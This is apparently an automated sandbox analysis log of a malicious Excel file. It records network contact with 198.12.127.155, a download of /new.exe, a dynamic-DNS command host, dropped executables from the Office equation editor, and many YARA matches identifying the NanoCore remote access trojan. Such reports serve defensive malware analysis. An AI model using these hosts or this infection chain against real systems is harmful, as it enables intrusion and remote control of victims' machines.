          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFD606D5.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.155Connection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: wekeepworking.sytes.net
          Source: RegAsm.exe, 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmpString found in binary or memory: http://google.com
          Source: RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: FFD606D5.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
          Source: RegAsm.exe, 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

          E-Banking Fraud:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.c10000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.cb0000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.e80000.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.6c0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b67402.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a5109c.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.c00000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.e1e8a4.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.a40000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.5b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.5c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.5b0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.5a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.e80000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a44ddc.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.e10000.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.a50000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.c10000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.cb0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b73634.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.5c0000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.c00000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.6c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.a50000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.e10000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.e14c9f.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001D3DD0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00431C02
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00431C20
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00431B97
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042C9E18
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042C63E8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042CF730
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042C0048
          Source: C:\Users\Public\vbc.exeCode function: 4_2_042C0044
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04A00048
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003C3DFE
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003544F0
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003538D8
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_0035CB70
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_0035BF58
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003545A8
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_0035CC2E
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_00CD08C8
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_00CD1578
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_00CD1636
          Source: Ref 0180066743.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RegAsm.exe 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
          Source: new[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: new[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: new[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: win33.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: win33.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: win33.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
